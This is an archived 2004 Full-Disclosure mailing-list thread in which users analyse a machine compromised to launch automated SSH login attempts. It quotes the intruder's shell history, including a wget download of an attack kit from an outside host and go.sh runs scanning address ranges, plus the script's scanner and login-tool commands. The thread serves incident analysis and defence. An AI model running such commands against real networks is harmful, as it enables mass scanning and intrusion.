| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
From: joe at joesmith.homeip.net (joe smith) Subject: Re: Automated SSH login attempts? you can decompile using REC. http://www.backerstreet.com/rec/rec.htm Andrei Galca-Vasiliu wrote: >By the way, you have to be root to use "ss": > >sweet@...rei:~/ssh$ ./go.sh 82.77.45 >scanning network 82.77.*.* >usec: 30000, burst packets 50 >using inteface eth0 >ERROR: UID != 0 > > >Intr-un mail de pe data de Thursday 29 July 2004 19:38, Stefan Janecek >povestea: > > >>Hmmm - I have also been getting those login attemps, but thought them to >>be harmless. Maybe they are not *that* harmless, though... Today I >>managed to get my hands on a machine that was originating such login >>attempts. I must admit I am far from being a linux security expert, but >>this is what I've found out up to now: >> >>Whoever broke into the machine did not take any attempts to cover up his >>tracks - this is what I found in /root/.bash_history: >> >>------ >>id >>uname -a >>w >>id >>ls >>wgte frauder.us/linux/ssh.tgz >>wget frauder.us/linux/ssh.tgz >>tar xzvf ssh.tgz >>tar xvf ssh.tgz >>ls >>cd ssh >>ls >>./go.sh 195.178 >>ls >>pico uniq.txt >>vi uniq.txt >>ls >>rm -rf uniq.txt >>./go.sh 167.205 >>ls >>rm -rf uniq.txt vuln.txt >>./go.sh 202.148.20 >>./go.sh 212.92 >>./go.sh 195.197 >>./go.sh 147.32 >>./go.sh 213.168 >>./go.sh 134.176 >>./go.sh 195.83 >>------ >> >>um-hum. I downloaded 'ssh.tgz', it contains the script go.sh and two >>binaries: >> >>go.sh: >>------- >>./ss 22 -b $1 -i eth0 -s 6 >>cat bios.txt |sort | uniq > uniq.txt >>./sshf >>------- >> >>* 'ss' apparently is some sort of portscanner >>* 'sshf' connects to every IP in uniq.txt and tries to log in as user >>'test' first, then as user 'guest' (according to tcpdump). >> >>This does not seem to be a stupid brute force attack, as there is only >>one login attempt per user. Could it be that the tool tries to exploit >>some vulnerability in the sshd, and just tries to look harmless by using >>'test' and 'guest' as usernames? >> >>The compromised machine was running an old debian woody installation >>which had not been upgraded for at least one year, the sshd version >>string says 'OpenSSH_3.6.1p2 Debian 1:3.6.1p2-10' >> >>As already mentioned, I am far from being an expert, but if I can assist >>in further testing, then let me know. Please CC me, I am not subscribed >>to the list. >> >>cheers, >>Stefan >> >> >> >> >> >> >>_______________________________________________ >>Full-Disclosure - We believe in it. >>Charter: http://lists.netsys.com/full-disclosure-charter.html >> >> > > >
Powered by blists - more mailing lists